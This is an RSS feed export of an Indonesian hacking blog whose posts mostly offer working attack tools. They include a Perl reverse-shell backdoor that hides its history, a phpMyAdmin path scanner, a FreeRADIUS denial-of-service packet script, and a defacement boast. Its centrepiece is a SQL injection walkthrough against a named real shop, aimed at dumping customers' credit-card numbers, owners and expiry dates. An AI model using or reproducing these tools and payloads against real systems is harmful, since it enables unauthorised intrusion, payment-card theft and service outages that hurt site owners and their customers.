<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>-=[banksonk a.k.a bento]=- &#187; Hacking</title>
	<atom:link href="http://www.kukukakikukakukaku.com/tag/hacking/feed" rel="self" type="application/rss+xml" />
	<link>http://www.kukukakikukakukaku.com</link>
	<description>www.kukukakikukakukaku.com</description>
	<lastBuildDate>Wed, 10 Aug 2011 04:14:43 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>I S4udi h4ck Where Are Your security</title>
		<link>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk#comments</comments>
		<pubDate>Sun, 29 Aug 2010 17:42:49 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[akhirnya]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=233</guid>
		<description><![CDATA[

allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :
hihihihi&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://i266.photobucket.com/albums/ii259/banksonk/hack.jpg" alt="" width="400" height="300" /></p>
<p style="text-align: left;">
<p><code>allah akbar STooP Admin .. ! ~@ I S4udi h4ck Where Are Your security ” It’s %0 Your Server Get Root ! I C0ntR0L We Are Here And There And Every Where..!! And Now Your Server In H3LL Dude..!! But Please Admin Don’t Cry Because I Laugh of Your Funny Face For Connect Us :</code></p>
<p>hihihihi&#8230; akhirnya kena deface juga.. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /> paling tidak seperti itulah sekilas jadinya weblog saia yang kena hack&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/blush.gif" alt=":blush_tb:" /> and thank`s untuk anak&#8221; S4udi h4ck yang uda bisa masuk matur suwun sudah di ingatken <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/wub.gif" alt=":wub_tb:" />  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/i-s4udi-h4ck-where-are-your-security.sonk/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Tak ada piNtu&#8230; jendela puN jadi&#8230;</title>
		<link>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk#comments</comments>
		<pubDate>Fri, 23 Oct 2009 04:17:30 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[perl]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=54</guid>
		<description><![CDATA[Dunia cyber emank syerem&#8230; hihihihihihi&#8230;atut   
walaupun ga punya kunci pintu jendela terbuka pun jadi&#8230;. kayaknya kata² itu pas untuk script backdor berikut&#8230;:
#!/usr/bin/perl
use IO::Socket;
#
#/home/programing$ perl dc.pl
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#/home/programing$ perl dc.pl 127.0.0.1 2121
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 [...]]]></description>
			<content:encoded><![CDATA[<p>Dunia cyber emank syerem&#8230; hihihihihihi&#8230;atut  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/annoyed.gif" alt=":annoyed_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/shock.gif" alt=":shock_tb:" /></p>
<p>walaupun ga punya kunci pintu jendela terbuka pun jadi&#8230;. kayaknya kata² itu pas untuk script backdor berikut&#8230;:</p>
<p><code>#!/usr/bin/perl<br />
use IO::Socket;<br />
#<br />
#/home/programing$ perl dc.pl<br />
#<br />
#Usage: dc.pl [Host] [Port]<br />
#<br />
#Ex: dc.pl 127.0.0.1 2121<br />
#/home/programing$ perl dc.pl 127.0.0.1 2121<br />
#<br />
#[*] Resolving HostName<br />
#[*] Connecting... 127.0.0.1<br />
#[*] Spawning Shell<br />
#[*] Connected to remote host<br />
#<br />
#bash-2.05b# nc -vv -l -p 2121<br />
#listening on [any] 2121 ...<br />
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121<br />
#<br />
#--==Systeminfo==--<br />
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux<br />
#<br />
#--==Userinfo==--<br />
#uid=1001(rocu) gid=100(users) groups=100(users)<br />
#<br />
#--==Directory==--<br />
#/root<br />
#<br />
#--==Shell==--<br />
#<br />
$system	= '/bin/sh';<br />
$ARGC=@ARGV;<br />
print "--== Rampok si kacRuT ==-- \n\n";<br />
if ($ARGC!=2) **<br />
   print "Usage: $0 [Host] [Port] \n\n";<br />
   die "Ex: $0 127.0.0.1 2121 \n";<br />
}<br />
use Socket;<br />
use FileHandle;<br />
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";<br />
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";<br />
print "[*] Resolving HostName\n";<br />
print "[*] Connecting... $ARGV[0] \n";<br />
print "[*] Spawning Shell \n";<br />
print "[*] Connected to remote host \n";<br />
SOCKET->autoflush();<br />
open(STDIN, ">&#038;SOCKET");<br />
open(STDOUT,">&#038;SOCKET");<br />
open(STDERR,">&#038;SOCKET");<br />
print "--== Rampok si kacRuT ==-- \n\n";<br />
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;<br />
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");<br />
system($system);<br />
#bento</code></p>
<p>selamad mencoba&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/tak-ada-pintu-jendela-pun-jadi.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Phpmyadmin Scanner Tools</title>
		<link>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk#comments</comments>
		<pubDate>Fri, 23 Oct 2009 03:59:53 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[shell]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=50</guid>
		<description><![CDATA[HiHiHiHiHiHi&#8230;dikasi tols temen nich&#8230;monggo yang mau nyoba&#8230;. 
#!/usr/bin/perl
# phpMyAdmin Checker
# Author: mHc@MimiZu (Re Edit) #
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request;
my ($add,$iplist,$url,@path,@raw_data);
print q(
phpMyAdmin Checker by mHc
);
if(@ARGV !=1) **
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";
exit;
}
$iplist = shift;
@path = (
"/phpMyAdmin/",
"/PMA/",
"/admin/",
"/dbadmin/",
"/mysql/",
"/myadmin/",
"/phpmyadmin2/",
"/phpMyAdmin2/",
"/phpMyAdmin-2/",
"/php-my-admin/",
"/phpMyAdmin-2.2.3/",
"/phpMyAdmin-2.2.6/",
"/phpMyAdmin-2.5.1/",
"/phpMyAdmin-2.5.4/",
"/phpMyAdmin-2.5.5-rc1/",
"/phpMyAdmin-2.5.5-rc2/",
"/phpMyAdmin-2.5.5/",
"/phpMyAdmin-2.5.5-pl1/",
"/phpMyAdmin-2.5.6-rc1/",
"/phpMyAdmin-2.5.6-rc2/",
"/phpMyAdmin-2.5.6/",
"/phpMyAdmin-2.5.7/",
"/phpMyAdmin-2.5.7-pl1/",
"/phpMyAdmin-2.6.0-alpha/",
"/phpMyAdmin-2.6.0-alpha2/",
"/phpMyAdmin-2.6.0-beta1/",
"/phpMyAdmin-2.6.0-beta2/",
"/phpMyAdmin-2.6.0-rc1/",
"/phpMyAdmin-2.6.0-rc2/",
"/phpMyAdmin-2.6.0-rc3/",
"/phpMyAdmin-2.6.0/",
"/phpMyAdmin-2.6.0-pl1/",
"/phpMyAdmin-2.6.0-pl2/",
"/phpMyAdmin-2.6.0-pl3/",
"/phpMyAdmin-2.6.1-rc1/",
"/phpMyAdmin-2.6.1-rc2/",
"/phpMyAdmin-2.6.1/",
"/phpMyAdmin-2.6.1-pl1/",
"/phpMyAdmin-2.6.1-pl2/",
"/phpMyAdmin-2.6.1-pl3/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2-beta1/",
"/phpMyAdmin-2.6.2-rc1/",
"/phpMyAdmin-2.6.2/",
"/phpMyAdmin-2.6.2-pl1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-rc1/",
"/phpMyAdmin-2.6.3/",
"/phpMyAdmin-2.6.3-pl1/",
"/phpMyAdmin-2.6.4-rc1/",
"/phpMyAdmin-2.6.4-pl1/",
"/phpMyAdmin-2.6.4-pl2/",
"/phpMyAdmin-2.6.4-pl3/",
"/phpMyAdmin-2.6.4-pl4/",
"/phpMyAdmin-2.6.4/",
"/phpMyAdmin-2.7.0-beta1/",
"/phpMyAdmin-2.7.0-rc1/",
"/phpMyAdmin-2.7.0-pl1/",
"/phpMyAdmin-2.7.0-pl2/",
"/phpMyAdmin-2.7.0/",
"/phpMyAdmin-2.8.0-beta1/",
"/phpMyAdmin-2.8.0-rc1/",
"/phpMyAdmin-2.8.0-rc2/",
"/phpMyAdmin-2.8.0/",
"/phpMyAdmin-2.8.0.1/",
"/phpMyAdmin-2.8.0.2/",
"/phpMyAdmin-2.8.0.3/",
"/phpMyAdmin-2.8.0.4/",
"/phpMyAdmin-2.8.1-rc1/",
"/phpMyAdmin-2.8.1/",
"/phpMyAdmin-2.8.2/",
"/sqlmanager/",
"/mysqlmanager/",
"/p/m/a/",
"/PMA2005/",
"/pma2005/",
"/phpmanager/",
"/php-myadmin/",
"/phpmy-admin/",
"/webadmin/",
"/sqlweb/",
"/websql/",
"/webdb/",
"/mysqladmin/",
"/mysql-admin/");
open(IPLIST, $iplist) &#124;&#124; die "
* Error: File not found\n";
@raw_data=;
close(IPLIST);
print " Scan Started\n\n";
foreach $url (@raw_data)
**
chomp($url);
foreach $add (@path)
**
my $address = $url.$add;
my [...]]]></description>
			<content:encoded><![CDATA[<p>HiHiHiHiHiHi&#8230;dikasi tols temen nich&#8230;monggo yang mau nyoba&#8230;. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p><code>#!/usr/bin/perl<br />
# phpMyAdmin Checker<br />
# Author: mHc@MimiZu (Re Edit) #<br />
use strict;<br />
use warnings;<br />
use LWP::UserAgent;<br />
use HTTP::Request;<br />
my ($add,$iplist,$url,@path,@raw_data);<br />
print q(<br />
phpMyAdmin Checker by mHc<br />
);<br />
if(@ARGV !=1) **<br />
print "Usage: perl phpmyadmin.pl e.g. perl phpmyadmin.pl iplist.txt";<br />
exit;<br />
}<br />
$iplist = shift;<br />
@path = (<br />
"/phpMyAdmin/",<br />
"/PMA/",<br />
"/admin/",<br />
"/dbadmin/",<br />
"/mysql/",<br />
"/myadmin/",<br />
"/phpmyadmin2/",<span id="more-50"></span><br />
"/phpMyAdmin2/",<br />
"/phpMyAdmin-2/",<br />
"/php-my-admin/",<br />
"/phpMyAdmin-2.2.3/",<br />
"/phpMyAdmin-2.2.6/",<br />
"/phpMyAdmin-2.5.1/",<br />
"/phpMyAdmin-2.5.4/",<br />
"/phpMyAdmin-2.5.5-rc1/",<br />
"/phpMyAdmin-2.5.5-rc2/",<br />
"/phpMyAdmin-2.5.5/",<br />
"/phpMyAdmin-2.5.5-pl1/",<br />
"/phpMyAdmin-2.5.6-rc1/",<br />
"/phpMyAdmin-2.5.6-rc2/",<br />
"/phpMyAdmin-2.5.6/",<br />
"/phpMyAdmin-2.5.7/",<br />
"/phpMyAdmin-2.5.7-pl1/",<br />
"/phpMyAdmin-2.6.0-alpha/",<br />
"/phpMyAdmin-2.6.0-alpha2/",<br />
"/phpMyAdmin-2.6.0-beta1/",<br />
"/phpMyAdmin-2.6.0-beta2/",<br />
"/phpMyAdmin-2.6.0-rc1/",<br />
"/phpMyAdmin-2.6.0-rc2/",<br />
"/phpMyAdmin-2.6.0-rc3/",<br />
"/phpMyAdmin-2.6.0/",<br />
"/phpMyAdmin-2.6.0-pl1/",<br />
"/phpMyAdmin-2.6.0-pl2/",<br />
"/phpMyAdmin-2.6.0-pl3/",<br />
"/phpMyAdmin-2.6.1-rc1/",<br />
"/phpMyAdmin-2.6.1-rc2/",<br />
"/phpMyAdmin-2.6.1/",<br />
"/phpMyAdmin-2.6.1-pl1/",<br />
"/phpMyAdmin-2.6.1-pl2/",<br />
"/phpMyAdmin-2.6.1-pl3/",<br />
"/phpMyAdmin-2.6.2-rc1/",<br />
"/phpMyAdmin-2.6.2-beta1/",<br />
"/phpMyAdmin-2.6.2-rc1/",<br />
"/phpMyAdmin-2.6.2/",<br />
"/phpMyAdmin-2.6.2-pl1/",<br />
"/phpMyAdmin-2.6.3/",<br />
"/phpMyAdmin-2.6.3-rc1/",<br />
"/phpMyAdmin-2.6.3/",<br />
"/phpMyAdmin-2.6.3-pl1/",<br />
"/phpMyAdmin-2.6.4-rc1/",<br />
"/phpMyAdmin-2.6.4-pl1/",<br />
"/phpMyAdmin-2.6.4-pl2/",<br />
"/phpMyAdmin-2.6.4-pl3/",<br />
"/phpMyAdmin-2.6.4-pl4/",<br />
"/phpMyAdmin-2.6.4/",<br />
"/phpMyAdmin-2.7.0-beta1/",<br />
"/phpMyAdmin-2.7.0-rc1/",<br />
"/phpMyAdmin-2.7.0-pl1/",<br />
"/phpMyAdmin-2.7.0-pl2/",<br />
"/phpMyAdmin-2.7.0/",<br />
"/phpMyAdmin-2.8.0-beta1/",<br />
"/phpMyAdmin-2.8.0-rc1/",<br />
"/phpMyAdmin-2.8.0-rc2/",<br />
"/phpMyAdmin-2.8.0/",<br />
"/phpMyAdmin-2.8.0.1/",<br />
"/phpMyAdmin-2.8.0.2/",<br />
"/phpMyAdmin-2.8.0.3/",<br />
"/phpMyAdmin-2.8.0.4/",<br />
"/phpMyAdmin-2.8.1-rc1/",<br />
"/phpMyAdmin-2.8.1/",<br />
"/phpMyAdmin-2.8.2/",<br />
"/sqlmanager/",<br />
"/mysqlmanager/",<br />
"/p/m/a/",<br />
"/PMA2005/",<br />
"/pma2005/",<br />
"/phpmanager/",<br />
"/php-myadmin/",<br />
"/phpmy-admin/",<br />
"/webadmin/",<br />
"/sqlweb/",<br />
"/websql/",<br />
"/webdb/",<br />
"/mysqladmin/",<br />
"/mysql-admin/");<br />
open(IPLIST, $iplist) || die "<br />
* Error: File not found\n";<br />
@raw_data=;<br />
close(IPLIST);<br />
print " Scan Started\n\n";<br />
foreach $url (@raw_data)<br />
**<br />
chomp($url);<br />
foreach $add (@path)<br />
**<br />
my $address = $url.$add;<br />
my $con = HTTP::Request-&gt;new(GET=&gt;$address);<br />
my $useragent = LWP::UserAgent-&gt;new;<br />
my $f = $useragent-&gt;request($con);<br />
if($f-&gt;is_success &amp;&amp; $f-&gt;status_line =~ /200/)<br />
**<br />
print "[!] Found: $address\n";<br />
open (F,"&gt;&gt;","found.txt");<br />
print F "$address\n";<br />
close(F);<br />
}<br />
}<br />
}</code></p>
<p>from : MiMiZu cRew</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/phpmyadmin-scanner-tools.sonk/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Hacking with SQL injection</title>
		<link>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk#comments</comments>
		<pubDate>Thu, 22 Oct 2009 03:23:47 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[carding]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=35</guid>
		<description><![CDATA[Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection&#8230;  ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk&#8230;sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!
Huyee&#8230;siapkan sebungkus starmild + kopi susu  
langsung sajoo, [...]]]></description>
			<content:encoded><![CDATA[<p>Setelah sekian lama ga pernah nulis di blog..akhirnya ada temen yg minta dibikinin tutorial tentang sql Injection&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/devil.gif" alt=":devil_tb:" /> ,Cuma butuh sedikit logika + kreatifitas..Tapi ga pa², berhubung temen seperjuangan menuntut ilmu di negeri nyamuk&#8230;sapa tau ntar kalo dah gw bikinin dia mau bantu kesulitan yang saia alami…H!H!H!H!H!</p>
<p>Huyee&#8230;siapkan sebungkus starmild + kopi susu <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/smoke.gif" alt=":smoke_tb:" /> <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/drunk.gif" alt=":drunk_tb:" /><br />
langsung sajoo, misal pada site <a href="http://www.scootsusa.com/">http://www.scootsusa.com/</a>, kita cari link yang ada bugnya&#8230;<br />
kita dapet :<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3</code><br />
Tinggal tambahin tanda petik satu (&#8217;) sajoo untuk test Vulnerbilitiesnya  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/laugh.gif" alt=":laugh_tb:" /></p>
<p>alhasil muncul keterangan error seperti berikut :<br />
<code>1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
select * FROM customer_testimonials WHERE testimonials_id = 3\'</code></p>
<p>Sekarang kita kasi perintah order by&#8230;buat nyari ada berapa kolom di sana&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 20--</code><br />
artinya kita coba cek langsung di binary 20, sekarang kita kurangin sampe muncul yang true&#8230;</p>
<p>ok..kita dapet yang true di binary 8<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 order by 8--</code><br />
sedangkan yang ke 9 uda false, jadi kita dapet binarynya di angka 8.</p>
<p>Selanjutnya kita bajak pake union select.<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,3,4,5,6,7,8--</code><br />
hasilnya :<br />
<code>Testimonial by 4<br />
3<br />
6<br />
</code></p>
<p>Langsung saja misal kita ambil angka 3 atau 6 juga bisa. <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /><br />
kita cek versi sqlnya doeloe&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,version(),4,5,6,7,8--</code><br />
hasilnya :<br />
<code>Testimonial by 4<br />
5.0.67.d7-ourdelta-log<br />
6</code><br />
ternyata sqlnya versi 5&#8230; lanjut bajak si kacrut&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>kemudian cari table dan coloumnya&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,table_name,4,5,6,7,8 from information_schema.tables where table_schema=database()--</code></p>
<p>nah lhoo kluar semua tuh nama tablenya&#8230;xixiixixixixi  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/jittery.gif" alt=":jittery_tb:" /><br />
Berhubung sekarang kita mau cari data CC , kita ambil table yg nyimpen data² CC<br />
Biasanya CC ada di table orders.<br />
Karna kita dah nemu table orders,kita coba pake table orders. Table lainnya silahkan oprek sndiri yah&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/thumbup.gif" alt=":thumbup_tb:" /></p>
<p>sekarang kita cari coloumnya&#8230; <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/guns.gif" alt=":guns_tb:" /><br />
sebelumnya kita konvert dolo table orders jadi hexa, jadinya 6F7264657273<br />
sebelumnya kita tambahin karakter 0x pada hasil convert tadi kemudian masukkan ke urlnya&#8230;<br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union all select 1,2,column_name,4,5,6,7,8 from information_schema.columns where table_name=0x6F7264657273--</code></p>
<p>Alhasil keluar tuh coloum²nya&#8230;hohoho<br />
payment_method,cc_type,cc_owner,cc_number,cc_expires, dll</p>
<p>ok skarang kita masukkan data² tadi dan haslinya&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/shock.gif" alt=":shock_tb:" /><br />
<code>http://www.scootsusa.com/customer_testimonials.php?testimonial_id=3 union select 1,2,concat_ws(0x3a,payment_method,cc_type,cc_owner,cc_number,cc_expires),4,5,6,7,8 from orders--</code></p>
<p>dan&#8230;eng..ing..eng&#8230;xixixixiixixixi <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/clap.gif" alt=":clap_tb:" /></p>
<p>semoga aja itu bisa sedikit membantu temen² yg pengen belajar SQL injection..Ini semua hanya sebagai pengetahuan sajooo&#8230;saia tidak ikod bertanggung jawab jika di salah pergunakan&#8230;  <img class="lmbbox_smileys_img" src="http://www.kukukakikukakukaku.com/wp-content/plugins/lmbbox-smileys/smileys/tb/flush.gif" alt=":flush_tb:" /></p>
<p>salam hangat&#8230;<br />
banksonk</p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/hacking-with-sql-injection.sonk/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Freeradius Packet of Death</title>
		<link>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk#comments</comments>
		<pubDate>Wed, 21 Oct 2009 02:59:50 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Network]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[radius]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=31</guid>
		<description><![CDATA[I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.
Earlier today, while reading through [...]]]></description>
			<content:encoded><![CDATA[<p>I haven’t had a chance to use <a href="http://www.secdev.org/projects/scapy/doc/index.html">Scapy </a>in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to <a href="http://www.hping.org/">Hping</a>. Scapy almost fits the bill.</p>
<p>Earlier today, while reading through <a href="http://www.gossamer-threads.com/lists/fulldisc/">Full Disclosure</a>, I came across something interesting: a <a href="http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/69935">Freeradius DoS bug</a>. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)</p>
<p>Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their <a href="http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py">Trac</a>.</p>
<p>So, download the layer to scapy/layers, ensure that it imports the required items:<br />
<code>    import struct<br />
    from scapy.packet import *<br />
    from scapy.fields import *<br />
    from scapy.layers.inet import UDP</p>
<p>    from scapy.layers.radius import Radius</code><br />
Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:<br />
<code>    #!/usr/bin/env python<br />
    # FreeRadius Packet Of Death<br />
    # Matthew Gillespie 2009-09-11<br />
    import sys<br />
    from scapy.all import IP,UDP,send,Radius,RadiusAttr<br />
    if len(sys.argv) != 2:<br />
    print “Usage: radius_killer.py <radiushost>\n”<br />
    sys.exit(1)<br />
    PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \<br />
    Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \<br />
    RadiusAttr(type=69,value=”",len=2)<br />
    send(PoD)</code></p>
<p>Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.</p>
<p>I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.</p>
<p>source : <a href="http://www.braindeadprojects.com">www.braindeadprojects.com</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.kukukakikukakukaku.com/freeradius-packet-of-death.sonk/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Belajar Menjadi Hacker</title>
		<link>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk</link>
		<comments>http://www.kukukakikukakukaku.com/belajar-menjadi-hacker.sonk#comments</comments>
		<pubDate>Tue, 20 Oct 2009 09:28:30 +0000</pubDate>
		<dc:creator>bento</dc:creator>
				<category><![CDATA[Coretan]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://www.kukukakikukakukaku.com/?p=27</guid>
		<description><![CDATA[Pada saat saya menulis ini, saya sangat berharap bahwa ilmu keamanan jaringan nantinya digunakan untuk hal-hal yang baik. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik [...]]]></description>
			<content:encoded><![CDATA[<p>Pada saat saya menulis ini, saya sangat berharap bahwa ilmu keamanan jaringan nantinya digunakan untuk hal-hal yang baik. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik sebuah dotcom akan jatuh jika situs mereka sampai bobol, rekan-rekan hacker sangat di harapkan menjadi konsultan keamanan bagi para dotcommers tersebut.</p>
